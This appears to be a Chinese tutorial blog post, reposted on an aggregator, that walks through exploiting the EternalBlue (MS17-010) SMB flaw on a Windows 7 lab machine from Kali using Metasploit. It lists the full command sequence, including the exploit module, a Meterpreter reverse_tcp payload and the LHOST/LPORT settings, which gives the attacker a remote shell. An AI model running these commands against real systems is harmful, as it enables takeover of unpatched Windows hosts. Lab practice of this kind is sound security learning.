【网络安全】用永恒之蓝(Eternal blue)测试windows系统的安全性

news2025/1/13 10:05:20

一、kali默认账户和密码都为kali

攻击机:Linux 的 kali
目标机:Windows7 x64

二、kali、metasploit、metasploit 攻击 windows操作系统、metasploit 攻击 永恒之蓝 全流程

①kali:是黑客攻击机。开源免费的Linux操作系统,含有300+渗透测试工具、Git树,集成了600+黑客工具。

②metasploit:kali最强渗透工具。开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续更新。让复杂的漏洞攻击流程变简单。

③metasploit 攻击 windows操作系统:如永恒之蓝漏洞,利用windows操作系统的SMB漏洞可以获取系统最高权限,端口为445。接着不法分子改造“永恒之蓝”制作了wannacry勒索病毒,被勒索支付高额赎金才能解密恢复文件。

④metasploit 攻击 永恒之蓝 全流程:

1>使用模块:use exploit/windows/smb/ms17_010_eternalblue

2>设置必选项:

查看必选项(required 为yes的就是必选项):show options

注:

搜索永恒之蓝漏洞:search ms17_010

使用模块:use+模块名或编号

只需要配置必选项即可。

端口有1-65535个,随意选择,只要端口未被占用,便可以使用。

可以自己搭建虚拟机去攻击。

三、启动metaspolit,进入msf命令行

①打开kali终端

②切换至root用户,使用命令:sudo su,输入kali的密码kali

③初始化metaspolit数据库,使用命令:msfdb init

④启动metaspolit(进入msf命令行),使用命令:msfconsole

注:

console=命令行接口

msf=metaspolit frame

exploit=攻击脚本(准备攻击)(火箭)

payload=攻击载荷(攻击过程中进行的操作)(火箭搭载的卫星)

meterpreter=攻击过程中获取的权限(开发者命名)=metaspolit后渗透的神器

description=描述

IP地址=计算机在互联网中的唯一标识=地址

target host=rhosts=RHOSTS=目标地址(加s因为一个攻击机可以攻击多个目标机)

target port=rport=目标的端口(永恒之蓝漏洞的默认端口=445)

listen address=lhost=LPORT=监听地址=攻击机的地址

listen port=lport=监听端口=攻击机的端口

命令行不区分大小写。

四、攻击另一台主机的流程

①搭建虚拟机环境,命令行cmd,输入ipconfig,获取目标的IP地址。

②在攻击机的终端,攻击目标地址,使用命令:set RHOSTS 具体目标地址或网段

例如:

具体目标地址为192.168.195.130

网段为:192.168.1.0-254

③【可不做】查看必选项(required 为yes的就是必选项):show options

④攻击后获取meterpreter,使用命令:set payload windows/x64/meterpreter/reverse_tcp

⑤设置kali的IP地址,使用命令:set LHOST kali的IP地址

先查看kali的IP地址:ifconfig的inet = 192.168.195.129

⑥设置监听端口,使用命令:set LPORT 端口号

⑦运行模块,使用命令:run

注:

通用命令:

windows查看IP地址:config 或 ipconfig 或 config -a

linux:

查看IP地址:ifconfig

帮助:help

查看选项:show options

退出到上一级:exit

清屏:clear

输入密码的时候不显示,自动读取键盘。

用户名密码:dwq

总结:

①sudo su

②kali

③msfconsole

④use exploit/windows/smb/ms17_010_eternalblue

⑤set RHOSTS 192.168.195.130

⑥set payload windows/x64/meterpreter/reverse_tcp

⑦set LHOST 192.168.195.129

⑧set LPORT 10000

⑨run

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1274448.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

11.30_黑马Redis实战篇分布式锁

实战篇9 设立一个在jvm外的锁监视器,可以处理多线程的问题 实战篇10 获取锁的时候,要同时发生获取锁以及设置到期时间。 实战篇11 thinking:JAVA中的自动拆箱与装箱? 【Java基础】自动拆装箱_Elephant_King的博客-CSDN博客 TR…

【微服务 SpringCloudAlibaba】实用篇 · Feign服务远程调用

微服务(7) 文章目录 微服务(7)1. Feign替代RestTemplate1)引入依赖2)添加注解3)编写Feign的客户端4)测试5)总结 2.自定义配置2.1 配置文件方式2.2 Java代码方式 3. Feign…

Unity随笔1 - 安卓打包JDK not found

今天遇到一个很奇怪的事情,之前可以正常打安卓包,但是突然报错如下: 提示很明显,找不到JDK了。可是我在下载Unity的时候明明安装了所有需要的组件,为什么今天突然不行。 看了眼Unity hub里面,没问题。 那就…

go elasticsearch 测试实例

// 查询列表数据 func QueryOperateList(ctx context.Context, esClient *elastic.Client, index string, pageNum, pageSize int, start, end int64, execSql string, list []interface{}, operateAccount string, operateAddr string, maxRows, minRows int, dbAddr, namespa…

【UGUI】实现背包的常用操作

1. 添加物品 首先,你需要一个包含物品信息的类,比如 InventoryItem: using UnityEngine;[CreateAssetMenu(fileName "NewInventoryItem", menuName "Inventory/Item")] public class InventoryItem : ScriptableObje…

【Azure 架构师学习笔记】- Azure Databricks (1) - 环境搭建

本文属于【Azure 架构师学习笔记】系列。 本文属于【Azure Databricks】系列。 前言 Databricks 已经成为了数据科学的必备工具,今时今日你已经很难抛开它来谈大数据,它常用于做复杂的ETL中的T, 数据分析,数据挖掘等,…

[架构之路-255]:目标系统 - 设计方法 - 软件工程 - 软件设计 - 架构设计 - 软件架构风格

目录 前言: 一、建筑风格 1.1 什么是建筑风格 1.2 常见的建筑风格 1.3 如何区分不同的建筑风格 二、软件架构风格概述 2.1 什么是软件架构风格 2.2 如何区分不同的软件架构风格 2.3 软件架构风格的发展阶段 2.4 软件架构风格与软件架构的区别 2.5 常见的…

在 S/4HANA、ECC 和 ERP 上轻松扩展或简化 SAP WM,并将其自动化到移动环境中

为您的 SAP WM 提供完整的本地 SAP 图形用户界面 基于原生通道架构(NCA),iOS、Android 和手持 Scanguns 版 Liquid UI 可与 SAP WM 原生连接,同时保留 SAP GUI 丰富的事务处理功能。它使您无需编程即可直接从移动设备访问 MIGO、…

知识图谱最简单的demo实现——基于pyvis

1、前言 我们在上篇文章中介绍了知识图谱的简单实现,最后使用neo4j进行了展示,对于有些情况我们可能并不想为了查看知识图的结果再去安装一个软件去实现,那么我们能不能直接将三元组画出来呢/ 接下来我们就介绍一个可视化的工具pyvis&#…

Memcached最新2023年面试题,高级面试题及附答案解析

文章目录 01、Memcached是什么,有什么作用?02、Memcached的多线程是什么?如何使用它们?03、Memcached与Redis的区别?04、如果缓存数据在导出导入之间过期了,怎么处理这些数据呢?05、如何实现集群…

网站提示不安全?

随着互联网的普及和发展,网络安全问题日益严重。黑客攻击、数据泄露、恶意软件等问题层出不穷,给企业和个人带来了巨大的损失。在这个背景下,确保网站安全显得尤为重要,而使用SSL证书是解决这些问题的有效措施。 什么是SSL证书&am…

【23-24 秋学期】NNDL 作业9 RNN - SRN

简单循环网络(Simple Recurrent Network,SRN)只有一个隐藏层的神经网络. 目录 1. 实现SRN (1)使用Numpy (2)在1的基础上,增加激活函数tanh (3&#xff0…

剪辑素材,6个可白嫖的视频素材网站

找视频素材就上这6个网站,免费下载,赶紧收藏好! 1、菜鸟图库 https://www.sucai999.com/video.html?vNTYxMjky 菜鸟图库网素材非常丰富,网站主要以设计类素材为主,高清视频素材也很多,像风景、植物、动物…

HTML—列表、表格、表单

1、列表 作用:布局内容排列整齐的区域 列表分类:无序列表、有序列表、定义列表 1.1 无序列表 作用:布局排列整齐的不需要规定顺序的区域 标签:ul 嵌套 li,ul 是无序列表,li 是列表条目 注意事项&#…

服务器数据恢复—EMC存储raid5故障导致上层应用崩溃的数据恢复案例

服务器存储数据恢复环境: EMC某型号存储,8块组建一组raid5磁盘阵列。上层操作系统采用zfs文件系统。 服务器存储故障&分析: raid5阵列中有2块硬盘未知原因离线,raid5阵列崩溃,上层应用无法正常使用。 服务器数据恢…

luceda ipkiss教程 38:等长波导布线

这次介绍通过调整圆弧角度实现等长弯曲波导布线的案例: 四段波导的长度分别为: 所有代码如下: from si_fab import all as pdk from ipkiss3 import all as i3 class MMI1x4(i3.PCell):_name_prefix "MMI1x4" # adding a nam…

事务--02---TCC模式

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 TCC模式两阶段提交 的模型 1.流程分析阶段一( Try ):阶段二(Confirm):阶段二(Canncel): 2.事…

利用ARCGIS做地下水脆弱性评价分析

(一)行政边界数据、土地利用数据和土壤类型数据 本文所用到的河北唐山行政边界数据、土地利用数据和土壤类型数据均来源于中国科学院资源环境科学与数据中心(https://www.resdc.cn/Default.aspx)。 (二)地…

【shell】正则表达式和AWK

一.正则表达式 通配符匹配文件(而且是已存在的文件) 基本正则表达式扩展正则表达式 可以使用 man 手册帮助 正则表达式:匹配的是文章中的字符 通配符:匹配的是文件名 任意单个字符 1.元字符(字符匹配&…

SAP_ABAP_编程基础_内表_创建内表 / 填充内表 / 读取内表 /修改和删除内表行 / 内表排序 / 创建顺序表 / 比较内表 / 初始化内表

SAP ABAP 顾问(开发工程师)能力模型_Terry谈企业数字化的博客-CSDN博客文章浏览阅读470次。目标:基于对SAP abap 顾问能力模型的梳理,给一年左右经验的abaper 快速成长为三年经验提供超级燃料!https://blog.csdn.net/j…